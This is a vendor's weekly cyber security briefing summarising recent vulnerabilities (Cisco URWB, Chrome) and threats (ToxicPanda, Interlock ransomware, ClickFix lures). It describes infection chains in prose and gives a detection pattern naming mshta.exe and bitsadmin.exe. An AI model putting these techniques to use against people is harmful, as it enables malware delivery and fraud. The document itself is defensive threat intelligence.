Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Briefing, 1 - 8 November
Cisco fixes bug in URWB access points that allows root command execution
Cisco has fixed a critical vulnerability in Ultra-Reliable Wireless Backhaul (URWB) access points that allows command execution with root privileges. This flaw, identified as CVE-2024-20418 and with a CVSSv3 of 10.0 according to the vendor, allows unauthenticated actors to perform low-complexity command injection attacks without requiring user interaction.
According to Cisco, the cause is improper validation in the web management interface of the unified industrial wireless software, and a successful exploit would allow arbitrary commands to be executed on the affected device's operating system. The vulnerability affects Catalyst IW9165D, IW9165E, and IW9167E access points when operating in URWB mode.
Cisco states that no available exploit code or evidence of ongoing attacks has been detected. Administrators can verify if URWB mode is active using the "show mpls-config" command. If the command is not available, the URWB mode of operation is disabled, and the device is not affected by this vulnerability.
Fixed two serious vulnerabilities in Chrome
Google has released a new update to its Chrome browser, which fixes two high-severity vulnerabilities discovered by anonymous researchers. The flaws, identified as CVE-2024-10826 and CVE-2024-10827, both with a CVSSv3 score of 8.8 according to CISA, correspond to a use-after-free bug identified in the Google Chrome Family Experiences and Serial components, respectively. An attacker could exploit the flaws to take advantage of memory management issues.
Both vulnerabilities have been fixed by updating the Stable Channel to version 130.0.6723.116/.117 for Windows and Mac and to version 130.0.6723.116 for Linux. The manufacturer has announced that the update will be distributed to users in the coming days or weeks, while the full list of changes is available in the Chrome registry.
ToxicPanda: new malware targeting Android
Researchers at Cleafy have published an analysis reporting the discovery of new malware targeting Android devices that enables threat actors to conduct fraudulent banking transactions. Specifically, the malware has been dubbed ToxicPanda, and is believed to have been created by Chinese-speaking actors, and shares similarities with another Android malware called TgToxic by having 61 common commands between the two.
According to experts, ToxicPanda's main goal is to initiate money transfers from compromised devices via account takeover (ATO) using a technique called ODF. In addition, its distribution method involves spoofing well-known applications such as Google Chrome, Visa and 99 Speedmart via fraudulent websites. In terms of victims, most attacks have been reported in Italy, followed by Portugal, although cases have also been identified in Hong Kong, Spain and Peru from retail banking users.
New analysis of Interlock ransomware
The Cisco Talos Intelligence team has released new details about the Interlock ransomware, which has been active since at least September 2024. Specifically, Interlock could have been created by the operators of the Rhysida ransomware due to similarities between the techniques and encryption binaries of both groups.
During the incident in which Interlock was detected and analyzed by the Cisco Talos team, the attacker gained initial access via a fake Google Chrome update that was downloaded from a compromised legitimate URL. That file was an executable containing a Remote Access Trojan (RAT) which, in turn, downloaded a credential stealer and a keylogger. Finally, the attacker deployed the ransomware binary, which masqueraded as a legitimate file, and encrypted the files on the infected devices and then demanded a ransom from the victims.
New ClickFix tactic detected
Sekoia researchers have analyzed a new tactic called ClickFix, whereby malicious actors use fake Zoom and Google Meet pages to distribute malware using legitimate tools. Specifically, users are shown a fake error message for a problem with the microphone or headset, prompting them to press “Windows + R” to open the Run dialog box. After this, they are instructed to paste and execute malicious commands, usually related to PowerShell scripts to download and execute payloads. The technique exploits the appearance of legitimacy to reduce the chances of detection. To infect macOS devices, a .dmg file is downloaded that executes the malware directly.
For Windows, two main infection chains are used: one uses a malicious Mshta command, while the other uses PowerShell. In order to detect and prevent this malicious activity, it is recommended to monitor processes such as mshta.exe or bitsadmin.exe started by Explorer.exe, as well as suspicious network requests made by these processes, and to use EDR systems to identify these patterns.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
